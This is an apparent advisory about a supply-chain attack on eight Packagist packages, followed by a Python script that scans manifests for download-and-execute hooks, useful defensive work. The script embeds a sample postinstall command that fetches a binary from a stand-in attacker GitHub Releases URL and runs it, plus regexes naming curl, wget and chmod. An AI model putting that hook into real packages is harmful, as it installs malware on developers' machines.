Packagist Supply‑Chain Attack Targets Eight Composer Packages with Malicious Linux Binary
Patch: Scan Composer packages for malicious package.json entries that download binaries from GitHub Releases, and replace or remove affected packages.
Summary
Security researchers have uncovered a coordinated supply‑chain attack that compromised eight Composer packages hosted on Packagist. The attackers inserted code that downloads a Linux binary from a GitHub Releases URL and executes it. Unusually, the payload was placed in the packages' package.json file rather than in composer.json. Composer itself never executes package.json, so the payload fires when the JavaScript toolchain installs the package, which is why JavaScript‑centric projects are the ones exposed. The eight affected packages span several categories, including popular libraries used in web applications. The malicious code evades Composer's integrity checks and can run arbitrary commands on the host. Developers using these packages should immediately audit their dependency trees for package.json entries that fetch and run binaries, then update to a known‑safe version or remove the affected packages. The incident underlines the need for continuous dependency scanning and verification of package sources.
Key changes
- Eight Packagist packages compromised in a coordinated supply‑chain attack
- Malicious code downloads and executes a Linux binary from a GitHub Releases URL
- Payload inserted into package.json, not composer.json
- Targets JavaScript‑centric projects
- Bypasses Composer integrity checks
- Affects multiple popular libraries
- Developers must audit dependencies for suspicious package.json entries
- Updating to known‑safe versions or removing the affected packages mitigates the risk
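The audit recommended above can be automated. The following script is an added example, not code published with the advisory or by any affected project: it walks a vendor/ or node_modules/ tree, parses every package.json and composer.json it finds, and flags string values that reference a GitHub Releases download URL, plus lifecycle scripts that follow a download‑and‑execute pattern. The regular expressions are heuristics chosen for this example, not indicators published with the advisory, and the sample manifests at the bottom are constructed for illustration.

```python
import json
import os
import re

# Heuristics (assumptions for this example, not published indicators):
#  - any string referencing a GitHub Releases download URL
#  - any lifecycle script that fetches something and then marks it
#    executable, pipes it to a shell, or runs it directly
RELEASES_URL = re.compile(
    r"https?://github\.com/[^/\s\"']+/[^/\s\"']+/releases/download/[^\s\"']+"
)
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b.*(chmod\s+\+x|\bsh\b|\bbash\b|\s\./)", re.S
)

MANIFESTS = ("package.json", "composer.json")


def iter_strings(node, path=""):
    """Yield (json_path, value) for every string in a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def scan_manifest(text, filename="package.json"):
    """Return (filename, json_path, reasons) findings for one manifest's text."""
    findings = []
    try:
        doc = json.loads(text)
    except json.JSONDecodeError as exc:
        # An unparsable manifest is itself worth a look.
        return [(filename, "<parse-error>", str(exc))]
    for json_path, value in iter_strings(doc):
        reasons = []
        if RELEASES_URL.search(value):
            reasons.append("github-releases-url")
        # "scripts" covers npm lifecycle hooks and Composer script hooks alike.
        if json_path.startswith("scripts") and DOWNLOAD_EXEC.search(value):
            reasons.append("download-and-execute")
        if reasons:
            findings.append((filename, json_path, ",".join(reasons)))
    return findings


def scan_tree(root):
    """Scan every package.json / composer.json below root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in MANIFESTS:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_manifest(fh.read(), full))
    return findings


# Constructed samples (not taken from the advisory): one manifest whose
# postinstall hook fetches and runs a binary from a GitHub Releases URL,
# and one benign manifest.
SAMPLE_MALICIOUS = json.dumps({
    "name": "example-lib",
    "scripts": {
        "postinstall": (
            "curl -sL https://github.com/attacker/repo/releases/download/v1/agent "
            "-o /tmp/agent && chmod +x /tmp/agent && /tmp/agent"
        )
    },
})
SAMPLE_CLEAN = json.dumps({"name": "clean-lib", "scripts": {"test": "phpunit"}})

if __name__ == "__main__":
    import sys

    root = sys.argv[1] if len(sys.argv) > 1 else "vendor"
    for filename, json_path, reasons in scan_tree(root):
        print(f"{filename}: {json_path} ({reasons})")
```

Run it against both vendor/ and node_modules/, since the advisory places the payload in package.json. A hit is a starting point for manual review, not proof of compromise: legitimate packages occasionally pin release assets, so compare any flagged entry against the upstream repository before deciding to remove or replace the package.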